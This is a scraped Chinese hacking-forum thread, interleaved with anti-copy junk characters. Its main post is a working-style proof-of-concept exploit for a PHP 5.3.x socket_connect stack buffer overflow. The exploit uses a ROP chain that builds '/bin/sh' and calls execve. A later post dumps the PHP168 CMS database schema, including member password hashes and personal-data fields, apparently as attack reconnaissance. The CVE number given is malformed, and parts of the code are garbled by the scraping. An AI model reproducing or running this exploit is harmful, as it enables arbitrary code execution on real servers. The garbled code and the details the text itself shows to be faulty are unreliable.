最近看过此主题的会员

返回列表 发帖

关于在本网站发布非法信息的处理通知!

非安全中国网管理组对于发布非法信息的用户一律封禁处理,删除全部帖子并清理此人在论坛的全部权限,相应的群对应用户一并清理,永久不在接收注册申请!同时本管理组保留一切技术手段取证并上报相关单位,引起的后果自负!
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

我在顶贴~!狂顶狂顶。~ 2 I$ u* b8 s! m( ^9 d) c2 S
2 D) r7 s' a! N, P0 V
6 j6 h2 x+ b/ h! I& z6 L+ g. Q# _

& m- W1 v; ^& [# M7 r& X7 w- j0 z: M4 N$ i

) w* Y/ z* D5 s: _$ D- f: d1 [+ Y8 |# q# K

- v' i5 o& a0 a+ Q# {# d4 {
  A; F+ d: |6 b, @% r# u3 F2 }5 t3 x' |! v9 g( ]# z( m

/ w' z& V6 F- |. F, J$ t+ Q
3 T3 c1 U. [$ k# L. A7 D& G1 `
- [& c! m* l2 G  ?: `; b% x: k) @' s1 A# K+ X! ]. p
$ P; `% X& t  h7 u4 r: ]8 D& x2 S
' m$ e+ s/ p2 Y2 t2 x6 e7 D

$ h6 h: t+ _& n# `+ Q6 R! i4 _0 P- R' L' r4 X& \6 R  m
# d- B+ N# M0 h* i
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

怎么就没人拜我为偶像那?? ~
# c4 b$ \/ X& l5 I2 d$ ]0 p7 z4 t4 }4 I! |: a. K

7 `; O; ?( j  v' Y3 v- q" M# f, U8 M$ p
0 e! @2 j4 w' C3 b
1 Q' z, t9 `( V/ Q

3 I( V. i4 ~6 l7 o  A! q  ~
- P9 ?1 W: O" g1 ]) E
! r0 m0 C# ?2 ^- j$ M8 |9 I
+ T+ Z) h- A2 J' Z1 Q8 _! q
+ @! Z, v/ F- y, F6 P/ N) g; H8 L3 _5 E6 j9 Q8 o" S& q

9 w2 a: [1 v2 @' \" Z7 ^! T2 ^2 @7 G% U5 y$ o/ g
8 _) t" n/ h- N/ c" c
/ a! c+ e. T: A0 D8 o

4 j2 c. r' a+ R5 w* p* y% m3 B. I1 N# j" Q% P& G$ W- }
* X8 y% r) u  G9 J) Q7 W6 P
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

PHP 5.3.6缓冲区溢出漏洞POC

! ]4 r$ t7 O' s3 h0 k7 ~8 a8 Q; `2 _
/ a) t8 v! m8 I  K
<?php- q2 D& x4 f' ^
# }  h! v3 B4 e
/* 1 g1 w0 q5 q  o* |
8 }( W0 r* V* D; z& Q8 \
** xiaolandjj@qq.com& S( w1 v  A/ |1 c& r+ j* e
- Q& F2 n2 C) L2 T9 B
** http://www.t00ls.net
, m7 D3 X9 Y4 F% ?7 e- f/ E0 c# C$ U7 j' P) V3 d% ?; d' T/ J
** 2011-07-14 [- [: b# J% }7 T+ L* K
7 r* `6 ~; V. ^, P
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c / F, J( c; H: G2 n) z" K* ^
& X5 z* ^5 k  D+ A5 c- M: y, x4 |
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
+ B- I- B8 Z, N' Z, k, i
6 Q: X4 Y% G3 t4 s7 r' T6 S** code via a long pathname for a UNIX socket.
& `! c: r9 J- a5 @8 J, ~" ]9 G. M
( D+ ^' y5 ]0 y0 x- C** by:小兰
' V% U0 l/ C  r# D1 ?" O5 S) W( u$ C# ~) w0 W8 T' O
** 改版的统统木jj4 W6 Q+ A3 }# V

3 K' ]/ c% [$ e6 R' z( U6 ?# c& u*/ 7 Y5 L1 C1 }2 D0 b

, {4 y. R- `) @( F( r4 h/ w+ x3 s0 q' ]
4 N* b, C6 a" X/ n
echo [+] PHP 5.3.6 Buffer Overflow PoC (ROP)
) k6 u& |2 k* v& l' q" |' Z;& ]" b4 f. s) `. w

7 Y$ M3 ]  I- D  ~7 a2 U. Q3 Vecho [+] CVE-2011-19384 O/ `0 ], f5 i* Y( ]1 I: Y
! o, a8 ~1 M, M1 k
; ( J: d  v" [% `, h" i1 t, I

* r- ]& ?5 |" g8 k* q9 @0 W# Gadgets in /usr/bin/php + e2 v# X- K& a. s6 d* e  P+ ?+ r* I
& I! Z" v' O* x& h
define(DUMMY x42x42x42x42); // padding 3 K$ ]5 c$ T/ o0 W' H
( S* {4 n8 l* O4 u' \
define(STACK x20xbax74x08); // .data 0x46a0 0x874ba207 x3 T& ?. m% p8 X

: B# Q0 w  M3 m8 ?define(STACK4 x24xbax74x08); // STACK + 4
4 ~1 b0 P  @1 m
0 l( u1 [% z+ T% k7 \define(STACK8 x28xbax74x08); // STACK + 8
/ M0 D; L# a6 y# }: |4 S0 b7 t
. t8 e7 `3 m* ?$ [, Zdefine(STACK12 x3cxbax74x08); // STACK + 12' w8 f- o* O7 Y1 M. l$ a

6 S/ x/ e1 p. I( d. S4 cdefine(INT_80 x27xb6x07x08); // 0x0807b627: int $0x80
  K! ?0 L  v. D
, `+ V% o7 h7 j; D6 \define(INC_EAX x66x50x0fx08); // 0x080f5066: inc %eax | ret
" G% Z& W4 H& ?8 k# ^! F9 x* o9 `# A% u( P- A
define(XOR_EAX x60xb4x09x08); // 0x0809b460: xor %eax%eax | ret
3 Y5 b1 [& \9 R  b- Q: n3 J) K
6 S2 S9 n4 v7 R8 Pdefine(MOV_A_D x84x3ex12x08); // 0x08123e84: mov %eax(%edx) | ret # U: [* c" a$ m- s
* T2 L2 C# Q  W
define(POP_EBP xc7x48x06x08); // 0x080648c7: pop %ebp | ret " [, }: A, |8 h1 x2 A
0 J& S! t' `& F9 d6 w4 P5 w
define(MOV_B_A x18x45x06x08); // 0x08064518: mov %ebp%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
: _- n% ]7 u% n$ \& j, l" k/ R* {; C2 F
define(MOV_DI_DX x20x26x07x08); // 0x08072620: mov %edi%edx | pop %esi | pop %edi | pop %ebp | ret
7 N- Z  Z+ G) R" M' s/ b6 ^( {
8 V) e  T7 `3 v5 ]/ M9 ldefine(POP_EDI x23x26x07x08); // 0x08072623: pop %edi | pop %ebp | ret
0 L9 K# J4 i* J' t: A
! }0 ^* a+ j2 ?; {5 odefine(POP_EBX x0fx4dx21x08); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret$ J* Q& Z4 s' ^; j( g7 q

  r4 T# ?+ ^$ o' h6 Ydefine(XOR_ECX xe3x3bx1fx08); // 0x081f3be3: xor %ecx%ecx | pop %ebx | mov %ecx%eax | pop %esi | pop %edi | pop %ebp | ret
% u, d( h( i! `0 `( `' }: I, D, U4 @) ~# K8 y0 ~
# z+ e7 ?( l1 r) K1 H  s7 d" C
  B' V6 W! M/ J- f) p, H5 U
$padd = str_repeat(A 196);1 G% B0 n& _/ {. f7 {' ?: k* c
' `/ a( D3 {( b) y" \- r

0 f6 j, x2 w, e$payload = POP_EDI. // pop %edi$ F3 C% Y6 F- Q3 M
1 ?1 Z6 ~0 J" c/ u
STACK. // 0x874ba20
1 K9 h" Q1 |: ], t9 m! Q8 n
* m/ ?8 P  s; y* u8 [DUMMY. // pop %ebp
6 O% ^! |( g% e5 `* K2 u) a2 x' u6 M& ?) C- T: \
MOV_DI_DX. // mov %edi%edx
( C7 n3 e7 l8 }
4 `, o$ m, E0 L8 w# ~7 ]7 KDUMMY. // pop %esi9 a0 M. K+ ?$ }+ Y+ N1 o( J/ s

1 z6 m" W7 b; }2 k' MDUMMY. // pop %edi5 m6 V4 m! O3 V" E" p- |
2 j$ K5 n2 o5 j/ o
//bi. // pop %ebp/ _* b1 a" `; A: y, p
% @; T& g, W3 q& O
MOV_B_A. // mov %ebp%eax
' W" u/ ~* G5 J/ b' F) F* {( k# d& G3 \
DUMMY. // pop %ebx+ w. K- N, e) B# e

* B& [% }1 N1 q4 @, a3 CDUMMY. // pop %esi( \( {7 e$ V1 k- u9 }
  R- {/ ^* p! _; F. {" G0 t
DUMMY. // pop %edi
- {5 c6 B% Q  Z) s% c: m) \8 a) v8 w, A& {3 _# o  ~
DUMMY. // pop %ebp + I- H, D; q+ Y% Y
" z' \, x4 y& ~6 }
MOV_A_D. // mov %eax(%edx) ( M+ F* N( j) m! E3 j

9 M: B' D9 S6 I' b2 x1 V5 E0 C5 Z8 ^POP_EDI. // pop %edi& L2 t) i3 I7 _5 u
) D6 [! T2 d; U9 M* ]/ m# D
STACK4. // 0x874ba24
+ w  c- m9 ], Q
% Q& u* l# m% wDUMMY. // pop %ebp0 p4 P1 g3 p1 Q5 m

' o6 }: ~) w, t1 YMOV_DI_DX. // mov %edi%edx8 K, ~+ h* \. `9 d8 f) D7 `

. ]: ^; o+ `0 v+ TDUMMY. // pop %esi
; a, a& w. ?% q% S
  z& ~5 Y8 P$ P/ bDUMMY. // pop %edi5 y/ G4 W. }: L- P# E- j, m1 U
: N: q& M* Y& J' ^  ?) G
n/sh. // pop %ebp
1 H  E3 Z9 {) B. Y
6 C# N; H) ~: a7 u& o, F. OMOV_B_A. // mov %ebp
# p) K2 p5 ^  Y( A0 E# |
9 [' ^+ G8 H* g4 eDUMMY. // pop %ebx- ~6 E+ v4 z" i7 |
' e! x0 L3 `# g$ [
DUMMY. // pop %esi
4 j- h$ c3 b) Q& M, W$ g# C
; z. u9 [; y9 G- W8 u" J" DDUMMY. // pop %edi
& T7 w$ V4 ~1 ~$ n2 Z
: J3 [4 `* ?5 G6 X3 `DUMMY. // pop %ebp
* P3 M- @# W7 m- U6 l
) R! K# W# H- v; x9 X4 \/ aMOV_A_D. // mov %eax(%edx) . i/ O- ?& g! `2 r
) q) N9 O5 a% l
POP_EDI. // pop %edi' Z+ w/ w- V6 Z+ e
/ q, w* a! }4 L, t0 g( K8 ~9 m: J
STACK8. // 0x874ba28 + V) Q: U1 f' m& Y* t3 {
; {  I0 }( y# I$ K: a
DUMMY. // pop %ebp
% l9 d( `: K7 J) [! G2 D' B
7 {3 I6 e( X2 }0 t* bMOV_DI_DX. // mov %edi%edx
# ~9 ~, y$ z& P5 O$ S
6 s- z5 q8 o# k1 H7 o. gDUMMY. // pop %esi: Q& a3 v( U1 P8 p9 A
/ [! @0 z: j3 `4 E" Y% H
DUMMY. // pop %edi
5 \0 B( L& l. f; T/ l0 U' V: j/ ~0 Y* h7 O" z+ l
DUMMY. // pop %ebp
9 \6 o, w% K5 ~* {" ?7 v: m, e6 c  y$ x2 o. u5 t
XOR_EAX. // xor %eax%eax
. H6 l0 w- h' O7 W( ~$ `
' n# Y. M7 z& x2 c5 I, IMOV_A_D. // mov %eax(%edx) 4 J) {5 d, r% Z$ ^0 k$ i8 B

& s8 h, x! @) L0 C. P- R% u; kXOR_ECX. // xor %ecx%ecx
5 A  t" `% V6 u  c! [0 O2 w
; K! e( |. B1 L4 [. gDUMMY. // pop %ebx
5 v6 f( Y  C; y; Z1 a$ x3 d* d2 I! W5 o. t( v( \' Y( k9 z1 I
DUMMY. // pop %esi 2 u! F8 B# d& P0 Z+ m

; g4 u, z, F* l$ }+ F1 tDUMMY. // pop %edi
; |7 e  H* B. t4 Y+ Q" X: p9 F7 U6 x
DUMMY. // pop %ebp
0 A. v8 n( z4 t! D$ p
' s8 F5 I2 z  l" I# x4 n% cPOP_EBX. // pop %ebx
2 n/ ~$ M7 ~( z, z5 I4 Z9 p. E3 B, M4 @4 I2 A% C; Y% {* a% L5 F
STACK. // 0x874ba20
4 ]% ~9 t% c& k) G8 W4 t) B+ F7 A( i' l- W
DUMMY. // pop %esi ( ?- s( \+ L8 I. h# ^

$ T. x/ k# f; z$ L# |7 YDUMMY. // pop %edi
4 m3 Y/ |9 h8 I; B& J4 V" K1 b
5 p, I$ J; `  f. IDUMMY. // pop %ebp4 x# Q9 `% t8 ^/ V  f

: _: N( }8 _9 t1 ~& j+ `" ~, q* qXOR_EAX. // xor %eax%eax
( H% O0 l/ u9 l; c; r- W0 E% z2 F) f4 D% I2 p/ j; t
INC_EAX. // inc %eax 1 f2 s/ Z+ |1 k. ?

; I% c0 k4 l5 d0 ~6 zINC_EAX. // inc %eax & K; ?# z, ?/ [- ^

2 N% a2 g- T+ y! R" r  k1 CINC_EAX. // inc %eax 8 g9 {  J6 a7 u! e
+ f+ w1 W5 n  ^; Z
INC_EAX. // inc %eax
) k1 s& V( @. `: Q' o- {( q$ j9 r0 f8 y
INC_EAX. // inc %eax 1 w3 s' T" f( b1 H

- x% Z& b3 y; f9 MINC_EAX. // inc %eax
! `5 {1 {0 K  A) B" m0 h" e2 `# |1 Z2 s" T) ~; j( k' x
INC_EAX. // inc %eax, E3 F' t, M: p2 l

. ^0 R+ S4 M( S) ^7 P4 s1 a9 h3 mINC_EAX. // inc %eax6 D0 a0 \- D" b) p
: m& k) I, ]( _  N  l9 p7 Q
INC_EAX. // inc %eax + c" k! H' a3 S- W; e- K% J

2 E/ c' p5 u4 |, @INC_EAX. // inc %eax" y' X( n9 R* N3 w! {; S0 D9 M# K9 x

1 d2 S+ K5 u& A. cINC_EAX. // inc %eax
& u, p& D+ f' b* v. E; m% @! ]$ l/ X: B2 p* m# v
INT_80; // int $0x80
- y- _! p& T/ X6 `9 M2 }7 k
( m1 P" `& i: n) e# r; Y, x. G8 N$evil = $padd.$payload;
- a6 ]% @+ B* {. I) t8 M2 K3 I6 A
% @* c, G5 ^0 F! t$ B
& k# b6 U' `2 t: c
$fd = socket_create(AF_UNIX SOCK_STREAM 1); % ?+ ]1 S6 ?$ y. b( w" Q" F3 _* _! m* M3 c

: N2 U4 e# R1 P5 t2 }$ret = socket_connect($fd $evil);
; D4 L  C3 C4 t* f4 X
# i8 e3 N2 }3 w6 W9 a7 X. c! \7 V6 v?> 复制代码
  M: R# q3 j2 V- ]  O3 E3 i. p8 o2 N: [1 i% Y
6 Y. Y  L* x4 q8 _8 u4 L0 i" e* X
- i! T0 d2 R. h6 ~- N8 W* M* d# _; r, ?

" D/ J+ j. d$ P* F1 ^9 v* Q5 G3 n" C5 Z4 O, n& f
2 e5 `8 G  I% y  D/ R
4 H! I  T. _5 `  F' y' i

- ~5 S& \" M$ Q* I5 F/ @6 g: A: O0 _( E% G( [2 h" n, C. R

0 f; t. E4 S5 Z7 {! y2 e' L5 @
: _9 o, A, b8 f8 u# k" s: J4 q( q* t$ M0 z6 s6 Y* S

6 R0 X6 l+ Z. v; |- V' W8 p8 U+ H$ S: j- E5 S! J, o

; y5 `7 Z, O( M1 P: w7 f  f# k% G, P

, A0 B* o% Q; Y7 ~  {
! K% W) T2 K' K% B. O公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

php168整站数据表结构
p8_article  文章标题表    aid  mediumint(7)  UNSIGNED 否    auto_increment      ---文章ID           title  varchar(150)   否             ---完整标题,必填        smalltitle  varchar(100)   否        ---短标题,少用             fid  mediumint(7)  UNSIGNED 否  0    ---栏目FID,必填                mid  mediumint(5)   否  0            ---所属模型,必填,如图片,下载       fname  varchar(50)   否              ---栏目名称,必填        hits  mediumint(7)   否  0           ---点击率        pages  smallint(4)   否  0           ---文章有几页        comments  mediumint(7)   否  0       ---评论数            posttime  int(10)   否  0            ---发布日期       list  int(10)   否  0                ---默认排序值    uid  mediumint(7)   否  0            ---发布者UID       username  varchar(30)   否           ---发布者帐号          author  varchar(30)   否             ---文章作者        copyfrom  varchar(100)   否          ---文章来源于           copyfromurl  varchar(150)   否       ---文章来源网址              titlecolor  varchar(15)   否         ---标题颜色            fonttype  tinyint(1)   否  0         ---标题是否加粗          titleicon  smallint(3)   否  0       ---标题图标(未使用)            picurl  varchar(150)   否  0         ---缩略图网址          ispic  tinyint(1)   否  0            ---是否有缩略图       yz  tinyint(1)   否  0               ---是否已审核,必填     yzer  varchar(30)   否               ---审核员      yztime  int(10)   否  0              ---审核时间     levels  tinyint(2)   否  0           ---是否推荐        levelstime  int(10)   否  0          ---推荐日期         keywords  varchar(100)   否          ---关键字           jumpurl  varchar(150)   否           ---跳转网址          iframeurl  varchar(150)   否         ---框架网址            style  varchar(15)   否              ---文章使用的风格       template  varchar(255)   否          ---文章使用的模板           target  tinyint(1)   否  0           ---是否新窗口打开        ip  varchar(15)   否                 ---发布者的IP    lastfid  mediumint(7)   否  0        ---文章删除前的IP           money  mediumint(7)   否  0          ---出售值         buyuser  text   否                  ----购买者    passwd  varchar(32)   否             ---密码        allowdown  varchar(150)   否         ---允许下载的用户组            allowview  varchar(150)   否         ---允许查看的用户组            editer  varchar(30)   否             ---最后修改文章的管理员        edittime  int(10)   否  0            ---最后修改文章的日期       begintime  int(10)   否  0           ---文章最早浏览日期        endtime  int(10)   否  0             ---文章结束浏览日期      description  text   否               ---文章描述      lastview  int(10)   否  0            ---文章最后被访问日期       digg_num  mediumint(7)   否  0       ---顶客次数            digg_time  int(10)   否  0           ---最后一次顶客时间        forbidcomment  tinyint(1)   否  0    ---是否禁止评论               ifvote  tinyint(1)   否  0           ---是否有投票        heart  varchar(255)   否             ---心情投票        htmlname  varchar(100)   否          ---静态页文件名       ================================== p8_reply   文章内容表    rid  mediumint(7)   否    auto_increment         ---内容递加ID,跟文章ID是两回事.这个不重要的       subhead  varchar(150)   否                  ---每篇内容的标题,不重要,一般为空    postdate  int(10)   否  0       ---每篇内容的发布日期,不太重要    aid  mediumint(7)   否  0                   ---文章ID,重要,必填    fid  mediumint(7)   否  0                   ---栏目FID,重要,必填    uid  mediumint(7)   否  0                   ---发布者UID    topic  tinyint(1)   否  0                   ---是否是第一页,第一页必须是1,对于多页,其它时候为0    ishtml  tinyint(1)   否  1                  ---一般为1,使用了在线编辑器    download  text   否                         ---没使用到    content  mediumtext   否                    ---文章内容    orderid  mediumint(7)   否  0               ---对于多页,页码排序,可为空 ==================================================== p8_sort  栏目表    fid  mediumint(7)  UNSIGNED 否    auto_increment   栏目FID              fup  mediumint(7)  UNSIGNED 否  0                父栏目FID    fmid  mediumint(5)   否  0                所属模型ID    name  varchar(50)   否                  栏目名称    class  smallint(4)   否  0               当前栏目属于第几级    sons  smallint(4)   否  0                当前分类有几个子栏目    type  tinyint(1)   否  0                0是分类,1是栏目,2是单篇文章    admin  varchar(100)   否                栏目管理员     list  int(10)   否  0                栏目排序值    listorder  tinyint(2)   否  0         栏目内容排序方式          passwd  varchar(32)   否               栏目密码      logo  varchar(150)   否                 栏目LOGO图片    descrip  text   否                  栏目描述    style  varchar(50)   否              栏目风格       template  text   否                  栏目与内容页使用的模板    jumpurl  varchar(150)   否           栏目跳转网址          maxperpage  tinyint(3)   否  0       栏目内容每页显示多少条            metakeywords  varchar(255)   否      SEO关键字               metadescription  varchar(255)   否    SEO描述                 allowcomment  tinyint(1)   否  0      栏目内容是否开启评论             allowpost  varchar(150)   否           允许投稿的用户组          allowviewtitle  varchar(150)   否      允许查看标题的用户组               allowviewcontent  varchar(150)   否               允许查看内容的用户组    allowdownload  varchar(150)   否               允许下载附件的用户组      forbidshow  tinyint(1)   否  0                是否禁止在父栏目显示本子栏目的部分内容    config  text   否                  备用,扩展    list_html  varchar(255)   否         列表页的静态网页文件名格式            bencandy_html  varchar(255)   否       内容页的静态网页文件名格式              domain  varchar(150)   否                  栏目绑定的域名,生成静态后,才可以绑定    domain_dir  varchar(100)   否               栏目静态生成在哪个目录  ================================================== p8_article_db   文章内容ID总索引,方便分表处理.别无其它用途.但又必须要有的.每发表一篇文章.必须在这里插入一条记录.方便今后的分表使用. aid  int(10)   否    auto_increment             文章ID ====================================================== p8_article_module       内容模型的配置文件,字段配置参数,如图片,下载    id  smallint(4)   否    auto_increment  模型ID               name  varchar(50)   否                  模型名称    alias  varchar(30)   否                  模型别名    list  smallint(4)   否  0                模型排序值,不重要    allowpost  varchar(255)   否              允许在此模型发布内容的用户组       style  varchar(30)   否                  模型风格    template  varchar(255)   否               模型所使用的模板      config  mediumtext   否                  模型字段及其它参数配置文件    keywords  varchar(30)   否               模型关键字      ifclose  tinyint(1)   否  0              模型是否启用     iftable  mediumint(4)   否  0             模型是否分表 ================================================== p8_comment 文章评论表    cid  mediumint(7)  UNSIGNED 否    auto_increment     评论内容的ID            aid  int(10)  UNSIGNED 否  0                被评论文章的ID    fid  mediumint(7)  UNSIGNED 否  0                被评论文章的FID    authorid  mediumint(7)   否  0                被评论文章的作者ID    uid  mediumint(7)  UNSIGNED 否  0                评论者的ID    username  varchar(30)   否                  评论者的帐号    posttime  int(10)   否  0                评论日期    content  text   否                  评论内容    ip  varchar(15)   否                 评论者的IP    icon  tinyint(3)   否  0                表情图标    yz  tinyint(1)   否  0                评论是否为审核    ifcom  tinyint(1)   否  0              是否推荐     agree  mediumint(5)   否  0             支持票数      disagree  mediumint(5)   否  0             反对票数  =============================================== p8_config 网站核心配置参数    c_key  varchar(50)   否     全局变量名                c_value  text   否                  全局变量值    c_descrip  text   否          没有使用到   ============================================================p8_members   用户通行证的表,如果整合了论坛,这个表将停用.作废,而直接使用论坛的表,作为主表   uid  mediumint(7)  UNSIGNED 否    auto_increment      用户的UID           username  varchar(30)   否                  用户的帐号   password  varchar(32)   否                 用户的密码 md5一次32位加密==============================================================p8_memberdata    用户基本资料的表   uid  mediumint(7)  UNSIGNED 否  0      用户UID             username  varchar(50)   否             用户帐号        question  varchar(32)   否             安全资料问题答案,没使用        groupid  smallint(4)   否  0            用户组ID       grouptype  tinyint(1)   否  0           是否为企业会员        groups  varchar(255)   否                归属多个用户组     yz  tinyint(1)   否  0                是否已验证   newpm  tinyint(1)   否  0               是否有短消息,没使用    medals  varchar(255)   否                勋章,没使用     money  mediumint(7)  UNSIGNED 否  0        财富积分值           totalspace  bigint(13)   否  0               空间大小    usespace  bigint(13)   否  0                已使用的空间   oltime  int(10)   否  0                在线时间,没使用   lastvist  int(10)   否  0              最后一次访问时间     lastip  varchar(15)   否                最后一次访问IP     regdate  int(10)   否  0                注册日期   regip  varchar(15)   否                  注册IP   sex  tinyint(1)   否  0                性别,1为男,2为女   bday  date   否  0000-00-00             生日      icon  varchar(150)   否                 头像    introduce  text   否                  自我介绍   hits  int(7)   否  0                空间访问量   lastview  int(10)   否  0            空间最后被访问的日期       oicq  varchar(11)   否                QQ号码     msn  varchar(50)   否                 MSN帐号    homepage  varchar(150)   否           个人主页网址          email  varchar(50)   否                邮箱     provinceid  mediumint(6)   否  0        所在省份          cityid  mediumint(7)   否  0              所在城市     address  varchar(255)   否                 联系地址    postalcode  varchar(6)   否                邮政编码     mobphone  varchar(12)   否                  手机号码   telephone  varchar(25)   否                  电话号码   idcard  varchar(20)   否                  身份证号码   truename  varchar(20)   否                  真实姓名   config  text   否                  功能扩展字段   moneycard  mediumint(7)  UNSIGNED 否  0                金币数量   email_yz  tinyint(1)   否  0                邮箱是否验证   mob_yz  tinyint(1)   否  0                手机号码是否验证   idcard_yz  tinyint(1)   否  0               身份证是否验证   =====================================================================  p8_group   用户组的表     gid  smallint(4)   否    auto_increment         用户组ID        gptype  tinyint(1)   否  0                是否为系统组,1为系统组,2为会员组   grouptitle  varchar(50)   否               用户组名称      levelnum  mediumint(7)   否  0               会员组升级积分    totalspace  int(10)   否  0                会员组可使用的空间大小   allowsearch  tinyint(1)   否  0                是否允许使用搜索   powerdb  text   否                  会员详细权限   allowadmin  tinyint(1)   否  0          是否允许进入后台         allowadmindb  text   是  NULL             后台详细权限  ===========================================================p8_label 标签使用的表   lid  int(10)   否    auto_increment             标签ID    name  varchar(100)   否                  标签名称,可为空   ch  smallint(4)   否  0                频道ID   chtype  tinyint(2)   否  0                如果头部与底部标签的话,则为99,其它为0   tag  varchar(50)   否                  标签关键字   type  varchar(30)   否                  所调用的内容类型,如文章,评论,图片,代码   typesystem  tinyint(1)   否  0            是否为系统的内容,是的话.是要从数据库MYSQL获取       code  text   否                  代码内容   divcode  text   是  NULL           层的一些配置参数,可为空        hide  tinyint(1)   否  0            是否隐藏标签不显示       js_time  int(10)   否  0             没使用      uid  mediumint(7)   否  0             更新标签的用户ID      username  varchar(30)   否               更新标签的用户帐号      posttime  int(10)   否  0               更新标签的时间    pagetype  tinyint(3)   否  0             页面类型.如主页1,列表页2,内容页 3     module  mediumint(6)   否  0              系统模型,如分类,下载     fid  mediumint(7)   否  0                调用标签那个栏目FID   if_js  tinyint(1)   否  0                是否是JS调用   style  varchar(40)   否                 当前使用的风格=========================================================p8_memberdata_1 企业资料表     uid  mediumint(7)   否  0          用户UID         cpname  varchar(50)   否           企业名称          cplogo  varchar(150)   否           企业图片标志          cptype  varchar(40)   否  0          企业性质         cptrade  varchar(40)   否             所属行业        cpproduct  varchar(255)   否          主营产品           cpcity  mediumint(7)   否  0          所在城市         cpfoundtime  varchar(20)   否           成立时间          cpfounder  varchar(20)   否             法人        cpmannum  varchar(20)   否               员工数      cpmoney  varchar(20)   否                  注册资本   cpcode  varchar(30)   否                  机构代码   cppermit  varchar(150)   否                营业执照扫描件     cpweb  varchar(150)   否                  公司网址   cppostcode  varchar(6)   否  0             邮箱编码      cptelephone  varchar(30)   否               联系电话      cpfax  varchar(30)   否                  传真号码   cpaddress  varchar(150)   否               详细地址      cplinkman  varchar(20)   否                联系人     cpmobphone  varchar(11)   否               联系手机      cpqq  varchar(11)   否                  联系QQ   cpmsn  varchar(50)   否                 联系MSN   ======================================================   p8_module      所安装的系统模块   id  mediumint(5)   否    auto_increment   分配的模块ID号              type  tinyint(1)   否  0                是否可安装多份   name  varchar(30)   否                  模块名称   pre  varchar(20)   否                  数据表前缀   dirname  varchar(30)   否                 存放目录    domain  varchar(100)   否                  使用的二级域名   admindir  varchar(20)   否                  后台目录   unite_admin  tinyint(1)   否  0             是否统一后台管理      config  text   否                  扩展   list  mediumint(5)   否  0                排序值   admingroup  varchar(150)   否             备用        adminmember  text   否                  模块管理员   unite_member  tinyint(1)   否  1          是否统一前台         unite_table  tinyint(1)   否  0           备用      ==========================================   p8_upfile用户上传的附件统计      up_id  mediumint(7)   否    auto_increment         附件ID        module_id  smallint(4)   否  0                模块系统ID   ids  varchar(255)   否  0                使用了此附件的文章ID   fid  mediumint(7)   否  0                使用了此附件的文章所在栏目ID   uid  mediumint(7)   否  0                上传者ID   posttime  int(10)   否  0                上传日期   url  varchar(150)   否                  附件存放目录   filename  varchar(100)   否                  文件名   num  smallint(5)   否  0                被使用的次数   if_tmp  tinyint(1)   否  0               备用===================================================   p8_template 公共调用的模板,如头部,底部,内容页,主页,列表页.用户可以不断添加公共调用的模板      id  mediumint(5)   否    auto_increment      分配的ID           name  varchar(50)   否                  模板名称   type  smallint(4)   否  0                哪种类型的模板,如头部,还是底部,还是主页等等   filepath  varchar(100)   否               模板路径      descrip  text   否                  描述,没使用   list  int(10)   否  0               排序值.==============================================p8_spsort  专题分类p8_special_comment  专题评论p8_special 专题内容p8_fu_sort  辅栏目分类p8_fu_article   辅栏目内容p8_channel  系统频道
6 U0 _. Y# n; n
& p* S3 r( J+ i1 r5 X$ F5 x4 g

. }6 m& I/ V0 o' a3 u9 P# L0 k( d5 r& S$ {7 B
/ H/ \0 B# b, _3 i
# J% f+ v: x& r, o, K

1 }* K5 |( f; \; w) z7 h5 A/ o- {# h. T2 {1 D3 C1 Y5 J' Z4 }& v

& @2 r6 r5 z1 }3 m0 _2 @! D; i
1 y" _$ n: e2 h2 g( J, B9 y* N: E
6 h6 o& D7 P; `5 f0 V
% v6 v' m. G; S- u* T
# N4 @0 A: b+ ^! N) _/ J/ w9 `: E

! S4 W: `, j$ x2 G& \
+ ?, A4 W: W: f" L" c! A
% Z/ \+ ]# n" j( D0 X) ?' r
6 P6 W$ z8 D' p! \/ `公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表